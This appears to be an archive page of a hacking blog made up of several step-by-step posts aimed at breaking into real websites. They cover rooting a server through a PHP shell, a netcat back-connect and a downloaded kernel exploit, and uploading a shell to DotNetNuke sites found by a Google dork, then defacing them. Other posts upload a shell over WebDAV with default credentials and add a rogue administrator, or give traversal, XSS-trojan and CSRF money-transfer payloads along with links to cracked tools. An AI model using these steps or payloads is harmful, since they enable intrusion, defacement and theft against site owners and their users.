Author Archives:

ROOTING (FULL TUTORIAL)

Nov 5

Posted by

Rooting Full Tutorial
This is Tutorial Which is not discussed
What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains and luck.


First of all, we need to get a shell on a site.
For this tutorial i will be using c100 or r57 Shell.

So, once you have it on a site, go to the ‘Backdoor Host’ tab and forward a port.

Now, go to the ‘Back Connect’ tab and insert the following settings:

1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd ‘Path To Your Netcat.exe’ and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\FeAR>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 8080 …

Now, when you have netcat listening to the port you forwarded, click ‘Connect’.

When your connected, type ‘whoami’.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type ‘uname -a’.

It should look something like this:

Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686

Now, we go on exploit-db.com and we will look for ’2.6.17′.

Code:
http://www.exploit-db.com/exploits/5092/

Now, we type ‘wget Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit on the netcat window.

Code:
wget http://xpl_url.com

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type ‘gcc 5092 -o exploit’.

Code:
gcc 5092 -o exploit

5092- After the url path.http://www.site.com/5092.
exploit- Output name.

Now you can execute your exploit by typing ‘./exploit’

Wait for the exploit to finish running and type root again.

It should output in something like this:

Code:
uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box .

There are more ways to do this, this is the way I usually do it. 

there are public exploits for some servers like 2009 and 2010 but 2011 or some 2010 servers are private exploit.i will be telling how to hack those using symlink in the next tutorial.

CYA 

Posted in defacing, Hacking, linux, R00TING

6 Comments

Tags: , , , , ,

Directory Traversal Tutorial

Oct 19

Posted by

Directory Traversal

HTTP exploits use the Web server software to perform malicious activities. Directory traversal is one such exploit which lets attackers access restricted directories, execute commands and view data outside the normal Web server directory where the application content is stored.

http://en.wikipedia.org/wiki/Directory_traversal

Detailed Description

Attackers use directory traversal attacks to try to access restricted Web server files residing outside of the Web server’s root directory.

The basic role of Web servers is to serve files. Files can be static, such as image and HTML files, or dynamic, such as ASP and JSP files. When the browser requests a dynamic file, the Web server first executes the file and then returns the result to the browser. Hence, dynamic files are actually files executed on the Web server.

To prevent users from accessing unauthorized files on the Web server, Web servers provide two main security mechanisms: the root directory and access controls lists. The root directory limits users’ access to a specific directory in the Web server’s file system. All files placed in the root directory and in its sub-directories are accessible to users. To limit users’ access to specific files within the root directory, administrators use access control lists. Using access control lists, administrators can determine whether a file can be viewed or executed by users, as well as other access rights.

The root directory prevents attackers from executing files such as cmd.exe on Windows platforms or accessing sensitive files such as the “passwd” password file on Unix platforms, as these files reside outside of the root directory. The Web server is responsible for enforcing the root directory restriction.

By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute powerful commands on the Web server, leading to a full compromise of the Web server.

A directory traversal vulnerability can exist either in the commercial Web server itself or in the Web application code executed on the Web server. In the case of Web application code, dynamic pages usually receive input from browsers. Here is an example of such an HTTP request:

http://www.acme-hackme.com/online/getnews.asp?item=20March2003.html

In this example, the dynamic page requested by the browser is called getnews.asp and the browser sends the Web server the parameter item with a value of 20March2003.html. When executed by the Web server, getnews.asp retrieves the file 20March2003.html from the Web server’s file system, renders it and sends it back to the browser which presents it to the user. A skilled attacker will immediately identify the potential problem in this request as the value of the parameter ends with a file extension, in this case “html”. The attacker will then assume that the dynamic page retrieves the file from the file system and uses it. By sending the following URL to the Web server:

http://www.acme-hackme.com/online/getnews.asp?item=../../../../ WINNT/win.ini

the attacker causes getnews.asp to retrieve the file ../../../../WINNT/win.ini from the file system and send it to the attacker’s browser. The term “../” stands for “one directory up”. This is a common operating system directive. Therefore, the string ../../../../WINNT/win.ini means “go four directories up and retrieve the file win.ini from there”. The attacker needs to guess how many directories to climb in order to get to the desired directory. (In this example the attacker tries to get to “C:\” and is assuming that the Web server’s root directory is located four directories below “C:\”). Guessing the exact combination is very easy. The attacker simply sends multiple requests until the desired result is achieved.

The directory traversal vulnerability occurs when programmers fail to validate input received from browsers. In the above example, the getnews.asp code does not validate that the value of the item parameter does not exceed from the root directory. The directory traversal vulnerability actually bypasses the Web server’s root directory restriction by introducing bad code into the Web server.

Web applications are not the only source of directory traversal vulnerabilities in your Web site. Some vulnerabilities exist within the Web server. These vulnerabilities can be part of sample files (e.g., sample ASP files) that exist on the Web server, or can be incorporated into the Web server software. For example, some earlier versions of the Microsoft IIS Web server included directory traversal vulnerabilities that allow attackers to fully compromise the Web server by executing files on the server. For example, the following URL:

http://www.acme-hackme.com/scripts/..%5c../winnt/system32/ cmd.exe?/c+dir+c:\

would execute the cmd.exe file (operating system shell) and run the “dir c:\” command which lists all files in the C:\ directory. Notice the string “%5c” that appears in the URL. This is a Web server escape code. Escape codes are used to represent normal characters in the form of %nn, where nn stands for a two-digit number. The escape code “%5c” represents the character “\”. The problem is that the IIS root directory enforcer did not check for escape codes and allowed that request to execute. The Web server’s operating system understands escape codes and executes the command.

Escape codes are also very useful for bypassing poorly written filters enforced on input received from users. If the filter looks for “../”, then the attacker could easily change the input to “%2e%2e/”. This has the same meaning as “../”, but is not detected by the filter. The escape code %2e represents the character “.” (dot).

Posted in cracking, defacing, Directory Traversal, Hacking

Leave a Comment

Tags: , , , , , , , , , ,

vbSEO-XSS to Reverse PHP Shell

Oct 19

Posted by

XSS is not a big deal, or is it? On many occasions, I’ve seen this vulnerability being classified as useless, not serious, and being a low threat. What I’ve always had in mind is that it’s only the capabilities of the browser, and the hackers mind which sets the limit for a XSS attack.

It may seem impossible to do anything else other than stealing sessions, cookies and performing phishing, client side defacements etc. But take a look at the picture above, that is a reverse php shell automatically injected into the site, when a vBulletin administrator viewed a malicious linkback.

The vulnerability itself I’m referring to, is a 0day within vBSEO which exists within the administrator and moderator panel only. However, the attacker is able to inject persistent scripts via this linkback feature directly into the part of these panels handling these linkbacks.

In short, the attacker crafts a malicious HTML page as shown in the advisory. Then, the attacker clicks a link to the target forum with vBSEO installed, and when the target is reached, vBSEO performs a GET-request to the attacker’s malicious HTML page (if it’s served online and if RefBacks are enabled).

The title of this page is then loaded directly into the database, and an administrator can see it sanitized in the actual thread, but also in the admin and mod panel where the title is not sanitized at all, allowing the script to run.

What is actually possible?

After discovering and researching this vulnerability, I realised it was a fine case to do further studies on and then develop a XSS worm. Fortunately I got away from that idea due to the fact it could’ve been abused globally on forums with vBSEO installed. However, the idea itself was not bad so I began developing the payload aka the javascript, which would eventually inject a PHP payload via the nice plugin feature in vBulletin.

Initially, the XSS trojan I wrote should be able to do all of this silently without the user knowing, so instead of document.write being used, appendChild which uses DOM objects, was used instead. This took a bit more work in order to function better, but the result was that the visible window would not change to the affected user getting infected with this trojan.

When the user browses to, in this case “Moderate Linkbacks”, the script is executing as soon as the user hits that page. When this happens, the trojan checks whether infection has already happened once and if not, continues. Then an iframe is created outside the visible frames, where the adminhash and securitytoken (CSRF-token) is read and saved in a local variable in the browser.

Then a new form is injected into this iframe, which contains the adminhash and the securitytoken. The form itself contains the values needed to create a new and completely valid plugin which in this case, is PHP code. At this point, the script checks again if the user has already been infected and if not, the form is submitted, the plugin is created, and a cookie is set to prevent the script from going in loops.

Most administrators, would notice the broken lock icon in case they use HTTPS / SSL, and then they would view the source. The great thing about using javascript to create HTML objects, especially with “appendChild” etc. is that it is not visible. A debugger, such as Firebug shown in the picture above is needed, unless the admin finds the malicious javascript payload and reads what it does, but then it might be too late.

During the execution of the XSS trojan, a time-out is set. When time runs out, the XSS trojan will try to delete itself leaving almost no traces, besides the possible injected plugin, and the remains of the hidden iframe outside the frames which cannot be viewed due to the way HTML works in FireFox.

If the attacker was successful, and patient as well, he would eventually see that the target website had already connected back to retrieve the title, but also that another user had triggered the XSS Trojan which hopefully injected the PHP plugin specified by the attacker.

So what’s this tool I’ve been using during my presentation of this vulnerability? It’s a recently developed tool written in Python, where the payload is written in Javascript, freely available to anyone in the bottom of this blog. I recommend however, that a user of this tool looks inside the source code.

Is XSS a serious threat then?

Yes, it definitely is.

 

Posted in defacing, Hacking, vbullentin, XSS

Leave a Comment

Tags: , , , , , , ,

DNN HACKING (DOT NET NUKE)

Oct 19

Posted by

Hello This Tutorial I will be explaining how to hack a website which has a Vulnerability.

DotNetNuke is written in VB.NET, though the developer has begun to shift to C# for future core development.[4] It is distributed under both a Community EditionBSD-style license [3] and commercial proprietary licenses as the Professional and Enterprise Editions. DotNetNuke is extensible and customizable through the use of skinsmodules, data providers, language packs and templates.

DotNetNuke uses a three-tier architecture model with a core framework providing support to the extensible modular structure. DotNetNuke can be extended using pluggable modules and providers that enable additional functionality. The look and feel of individual sites can be customized using skins. The following diagram illustrates the software layers of a typical DotNetNuke deployment: The current, 5.x generation of DotNetNuke requires Internet Information Services 6 and ASP.NET v2.0 to v4 and supports SQL Server 2005 and 2008. Previous generations of DotNetNuke supported SQL Server 2000 and ASP.NET v1.1.

The DotNetNuke application originally evolved out of another project, called the IBuySpy Workshop.[9] The IBuySpy Workshop application had been created by Shaun Walker [10] as an enhancement to the IBuySpy Portal that started as a sample application for the .NET Framework. Early versions of DotNetNuke were released by Shaun’s company, Perpetual Motion Inc, while later development was expanded by the open source community.

Now Lets begin the tutorial 

FIRST STEP: GO TO WWW.GOOGLE.COM

SECOND STEP: IN A SEARCH BOX TYPE…….

:inurl:/tabid/36/language/en-US/Default.aspx

THIRD STEP: you will find many sites, Select ONE OF THEM….

FOURTH STEP: 
For example take this site.

Example:

http://www.abc.com/Home/tabid/36/Lan…S/Default.aspx

Now replace

/Home/tabid/36/Language/en-US/Default.aspx 

with

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:
You will get a Link Gallary page.So far so good!

Step 7: 
Dont do anything for now,wait for the next step…

Step 8:
Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack(‘ctlURL$cmdUpload’,”) 

Step 9:
You will Find the Upload Option

Step 10:
Select Root (The option u will see)

Step 11:

Upload your package Your Shell c99,c100 etc etc 

Here i will give u a asp shell 

STEP 12: http://[PATH]/portals/0/dz4all.asp;me.jpg (eg)

DOWNLOAD LINK : http://www.mediafire.com/?ons6edehktvg737

STEP 13:

UPLOAD UR DEFACE PAGE 

Dang thats it now it is defaced

Posted in defacing, Hacking

2 Comments

Tags: , , , , , , , , ,

Hash Analyzer

Oct 16

Posted by

Thought I’d share this because I see many of the People requesting for what kind of hashes are the posted ones…etc This will tell you what kind of hash a particular one is so you can find the decryption algorithm accordingly.

Download Link : Here 

Note: This is NOT going to decrypt your hashes.

Source: http://dz4all.com/cc/t393.html

Screenshot :

Enjoy

Posted in cracking, defacing, Hacking, linux

Leave a Comment

Tags: , , , , ,

Cross Site Request Forgery [ CSRF ]

Oct 15

Posted by

With CSRF attack we can to send a fake request from the browser of the user, and thus enter to site with the permission of the user and maintain interact with the site like the script is the user himself.

A great example of using on CSRF, is bank site after the user connects to site created cookies on his computer(Role of the cookies is save the data).
From this moment any action performed from the user browser approved by the site system. Here comes in the AJAX technology, with the AJAX we can to send request(packet request) performed by the browser itself.
This means all the cookies and sessions of the user sent with the request(Unlike server-side language) So if there is a form that is used on bank site to money transfer.
We can send POST request to a form using AJAX and the request is approved by the site system, because all the cookies of the user browser sent with the AJAX request

Example for CSRF exploit

<form action=”" method=”post” name=”transfer”>
Amount of money to transfer:

<label>
<input type=”text” name=”money” id=”money” />$
</label>
<br />

For bank account:

<label>
<input type=”text” name=”Baccount” id=”Baccount” />
</label>
<p>
<label>
<input type=”submit” name=”send” id=”send” value=”Submit” />
</label>
</p>
</form>

php:

<?php
if(isset($_POST['send'])
{
if(is_numeric($_COOKIE['id'] && isset($_COOKIE['password'])
{
if(..)
{
//if is valid cookies
//transfer
}
else
{
//if is invalid cookies
//blocking
}
}
}
?>

What’s the risk here?, as you can see the php script check if it’s valid cookies and without additional filtering operation approved the transfer.
This means that if we have the cookies we need only to send fake request to system with the cookies of the user and the system is approved the transfer.

<script type="text/javascript">var http = GetXmlHttpObject();if(http != null)
{
var url  = “”; //Attacking form address
var pack = “money=100&Baccount=0123456789&send=Submit”;

http.open(“POST”, url, true);

http.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
http.setRequestHeader(“Content-length”, pack.length);
http.setRequestHeader(“Connection”, “close”);

http.send(params);
}

function GetXmlHttpObject()
{
if(window.XMLHttpRequest)
{
return new XMLHttpRequest();
}

if(window.ActiveXObject)
{
return new ActiveXObject(“Microsoft.XMLHTTP”);
}
return null;
}

</script>

As already explained, requests sent AJAX are sent from the browser itself so we do not have to worry about to get the cookies of the user.
So even though we sent only the POST in the request sent to the server you’ll see something like this:
POST /file.php HTTP/1.1 \r\n
Host: www.serverAddress.com \r\n
Cookie: id=…; password=..; \r\n
Connection: Close \r\n
Content-Type: application/x-www-form-urlencoded \r\n
Content-Length: …. \r\n\r\n
money=100&Baccount=0123456789&send=Submit
Once returned from the server 200(request was received successfully) transferred $100 from the user account to account number 0123456789.
And so the CSRF attack works, Hope this helps.

Posted in cracking, defacing, Hacking, linux

1 Comment

Tags: , , , , , ,

Hash Types

Oct 13

Posted by

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string “Iv”), then there follows the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number ’9′), then there goes the salt (8 random characters; in our example the salt is the string “12345678″), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]

MD5(WordPress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in WordPress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number ‘B’), then there goes the salt (8 random characters; in our example the salt is the string “12345678″), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]

————————————————-
Notes:

[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).

[2] The hash is to be loaded to the program in full, to the “Hash” column – the program will automatically extract the salt and other required data from it.

[3] The ‘:’ character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.

[4] Salt can contain special characters – single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a’4 instead of a\’4, as well as the salts a”4 instead of a\”4 and a\4 instead of a\\4.

Posted in cracking, defacing, Hacking

4 Comments

Tags: , , , , ,

★★ How to find admin pages of any website ★★

Oct 13

Posted by

Hello People .Today im gonna show how to find admin panels when you have info to login.

There’s a few options to find it.

1) Adding to URL

http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/admin.php
http://www.site.com/login

2) Online scanning (Link is at the end)

Picture:

3) Perl scripts (Script and Active Perl link will be on end of this page)

For this you will need install Active Perl…

4) Programs (Links at the end of the thread)

You can use Havij or Reiluke’s admin finder

5) Scan ports (Link at the end of the thread)

For that use nMap.First you need to get your websites IP address.
Go to cmd (start>run>cmd) and type ping site.com (without http://www. After that paste the IP in nMap and click ‘Scan’
When finished pick tab ‘Ports/computers’

Picture:

6) Crawl website (Link + crack to acunetix)

Just scan all files and folders on site.Acunetix is the right tool

7) robots.txt

Check robots.txt
http://www.site.com/robots.txt

7) Google

Dork: site:webpage.com “admin”
site:webpage.com “login”

Downloads and links:

Online scanner -> http://sc0rpion.ir/af/

Download Perl -> http://www.activestate.com/activeperl/downloads
Perl script -> http://pastebin.com/WWZszURW

Havij  -> http://www.mediafire.com/download.php?s2iiaabz87i7t8a
Reiluke admin finder  -> Automatic download

nMap -> http://nmap.org/download.html

Acunetix  -> http://www.mediafire.com/download.php?vam13z7pe1b85kl

Password for locker .rar is : www.reiluke.i.ph

Well now no one can excuse to say that i cannot find the admin page hope this helps you guys happy hacking .

Posted in cracking, defacing, Hacking

2 Comments

Tags: , , ,

WEBDAV HACKING

Oct 12

Posted by 

1.) Run WebDavLinkCrawler and let it scan!
2.) When you think it's enough, press 'Stop',
 then 'Remove Double' to remove Double IPs.
3.) Right Click one of the iPs and Press 'Alle IPs Kopieren'
 Then open up Notepad and paste the IPs, save as whatever you want.
4.) Open up Ip Scanner, load up the IPs TxT File, and Press 'Scan'
5.) Now, the First column are the loaded IPs, the second one the Exploitables,
 and the third one are the scanned IPs.
6.) Now, after a time there will be more and more IPs in the middle Column.
 Copy/Paste those in Notepad. Let's say first one is 111.222.333.444, go to your Webbrowser.
 Firefox reommend, and paste the ip, with /webdav" after it. So it's 111.222.333.444/webdav.
 If it says 'WebDAV testpage', it's vulnerable. Install BitKinex, open it up. Press CTRL + 2
 Type anything as Name, then a windows will pop up. As Server adress put the IP of the 
 Vulnerable Server. As User put "wampp" and as Password put "xampp".
 Then go to 'Data Source' on the left of the Window, and put "/webdav" as Default Directory.
 Press OK, then right click your Server on the Http/WebDAV Tab, and click Browse.
 It will connect to it, then you can upload your Shell.php. After it's uploaded, go to the
 http://IPHERE/webdav again, only put SHELL-NAME-HERE.php after /Webdav. So it's 
 111.222.333.444/webdav/shell.php or something like that. Then execute following commands:

 net user Username /add 
 net user Username Password 
 net localgroup "Administrators" "Username" /add

 Instead of Username, put the desired Username, I recommend something like "SQLOperator".
 Instead of Password put your password in this layout -> something!numbers. Otherwise it won't work.

7.) That's it. Now you only need to open up Remote Desktop Connection or something similar, and connect.
 
Download Link :http://www.mediafire.com/?bwvakq9jaw4xu2w

Posted in cracking, Crypting, defacing, Hacking

Leave a Comment

Tags: , , , , , ,

★★How to prevent yourself from getting DOX’ed, Simple steps that can make you completely anonymous online★★

Oct 12

Posted by

DISCLAIMER:
Because this knowledge can be used to protect yourself and to DOX others, I
do not take any responsibly for the info I provide. By using this tutorial and knowledge you
have the ability to do illegal activities. May I remind you that SWAT’ing is highly illegal,
and several arrest have been after calling in a SWAT. Don’t use this the wrong way
but secure yourself from getting SWAT’ed or DOX’ed.

#What is DOXING?
-The question has been brought up several times by many different people. Everyone has their own opinion on what it is in my opinion it is someones life in a text document. From DOXING you learn to be the person you can kind of think of yourself as a spy there is nothing you can’t learn or do from Doxing.If someone’s DOX were to be “dropped” as some say before you know it people know your life. They know where you live, what your house looks like, your family, your friends. They learn your life and all it takes is the Internet from the internet you will learn everything about them. And to be honest it sucks, but DOXING is a powerful tool.

DOX looks like:

  • (1) Name
  • (2) Gender
  • (3) Birthday
  • (4) Age
  • (5) Website
  • (6) Email Id
  • (7) Social Networking Site Profiles -> Facebook/Yahoo/Orkut/Twitter/My space
  • (8) Location/Area/Country
  • (9) IP – Address
Intro
What do you don’t want to get found online? Your bank and your Facebook. So make sure you use other info for those two. Facebook and other sites have many privacy settings. Customize them to your stealth level :D

Paypal tip
Do not have your address or very personal Information on Ur Paypal . This is because it is a very sneaky but cunning way of getting information . To do this . Sign in on your Paypal and go to Request money . Then type in the email you want aand select 1$ and set money request to goods . Then when the request is sent the person can click on the request tab thing and can see such things as Address , name . Easy way of getting dox .
We will talk later in this tut about private information, thanks for adding baker.
Usage of emails
The usage of e-mails, everyone has their official e-mail. Usually their full name, so make another account for all your other shit! It’s not that hard, a gmail account is easy made!
email for hacking
Well, I asume this goes without saying, but use a different email for your Haxoring activities than your private life. I have my hacking email as the email of my alias so that if anyone finds it, it might send them in the wrong direction. I also hate signing into different email accounts so I never log into my hacking account, I just set up a filter (it’s a Gmail) so that it forwards ALL my mail to my normal email account.
Ten minutes mail!
I like this one allot, I got it from a friend.

You can use this
as a mail to register. Works really good!
You can use this
as a mail to register. Works really good!
Tracing IP’s from Emails
Yes this is possible, when you send an email your IP will be send within. Let me show you;
I will use this mail that is fake
The source
Posting real info
Never post your real info online! I haven’t filled a register seriously since 2001 something. The simplest things might scare you. Example I needed to register for some booter, and it asked for my site username. Then I figured once I connect to the site he has my IP and when I give him my site username he can link the two. What gives him a massive database of site IP adresses. Always think with caution.
Online Register
Online register. I suggest to take a BS name for only, I use the name John Travolta. Why? This name seems to be normal so auto-correction wont go crying and well yeah you can’t get traced
Fake name generator 
Make a full name with address and things on:
Computer name and Meta Data
Your computer name! When you make an office file your name gets binded to that file. So when your computer name has your full name and you share a .DOC file everyone can simply check out your full name
SKYPE!
Using skype is the easiest way to get IP’s. Be extremely cautions with that. I never give out Skype to people I don’t know. I suggest using MSN or chat apps for chatting with unknown people.
Links given by other
IP trackers are good these days, someone says check this thread and uses a bitly to redirect to a fake page. And they have your IP.
If you’re afraid to open a link, use a proxy. I have set up a simple proxy PM me for it. It’s fast and used by 5 people at the moment, or use my e-book to setup TOR browser or use CYBERGHOST which I can recommend.
PHP image trackers
These are the hardest, there is a way to track IP’s using a image. Just try to remember most uploading sites and maybe even ask if the person can upload the file to there
How to notice
Usually they are like this
www.domain.com/awesometits.jpg/
Noticed the / after the .jpg? That means it’s a directory, not a picture.
When you connect to a site
Be aware that the site will store your IP, and is visible in a log view-able by the owner
When they got your IP
Don’t worry he wont h4x0rrRz you, but he is in most cases able to find out where you live. (the town) When you are a SE legend you may find out the address but nothing more. Only when you have a computer from 1800 he’s able to hack you trough IP. Just make sure to have proper AV’s installed. (Not saying you can’t get hacked trough IP, but it’s extremely hard.)
I’m getting (D)DOS’ed, now what
When this is a DOS attack I suggest downloading WireShark and getting the IP of the person attacking you.
When this is a DDOS, and you’re getting attacked regular. Call your ISP (Internet Service Provider) and tell them, they will change your IP.
(You can’t know when you’re getting attacked so running a live capture in WireShark never hurts :D )If you have a dynamic IP
Unplug your router, wait some time and restart 
Linking to accounts
When you have your mail on your youtube and you link someone your account they can see your email and they can try to trace that.
If anyone seems to find your facebook a thing you can do to stop it is this .
Go to http://www.facebook.com/username/
Then you can type what ever you want and it will change ur URL . 
So from like : http://www.facebook.com/profile.php?id=100153119193
To like : http://www.facebook.com/name
Great security tip . Then change ur profile pic and add a symbol in ur name so they dont find you again .
Trying out your own DOX
Check one of these sites: 

And these for your address (mostly US)

Try out your full name, emails and game tags. Try finding info you don’t want showing up!
Family on Facebook
When you link your account to someone that’s your family think about the consequences that may have!
PHOTO INFO!
Important one! When you make a photo with your smartphone TURN OFF GPS! When you make a photo while having GPS on everyone is able to see the exact location of that photo. Example you upload a photo saying just chilling on FB and your girlfriends see that the picture is shot a girls house.
Whenever you post a image in forum, just don’t upload the real image. Its way safer to snapshot the real image using snipping tool and then uploading it to image-servers. By doing this all image data’s like geo tagging, etc can be hidden. 
You think it’s all good you covered the eyes and. But now I do this

And what do I find?
WHOIS Scan
For the site owners, be aware that a person always can do a WHOIS scan on your site.WHOIS of Google (Example)
 Your server.exe
Oke this one goes a little bit far, but you can infect a computer and see the connection of the .exe This will be to the attackers IP, unless you use a VPN to connect.  Think of programs like,  Sending data When you think you're fully anon (You're on a VPN without logs, and you bought the VPN with fake info etc. etc.) your ISP (Internet Service Provider) can always see what you're doing. unlessyou encrypt your data using a SSL connection to sites.  Don't think you can distribute CP (example of something highly illegal, don't freak out) because your IP can't be back traced. Think! Think smartly where to put what info, this can help you allot Try to make yourself save online. It's simple. Be safe on the internet, Sweat CREDITS TO SWEETHEART,LENS

Posted in cracking, defacing, Doxing, Hacking

Leave a Comment

Tags: , , , , , ,

← Older Posts
Newer Posts →
Follow

Get every new post delivered to your Inbox.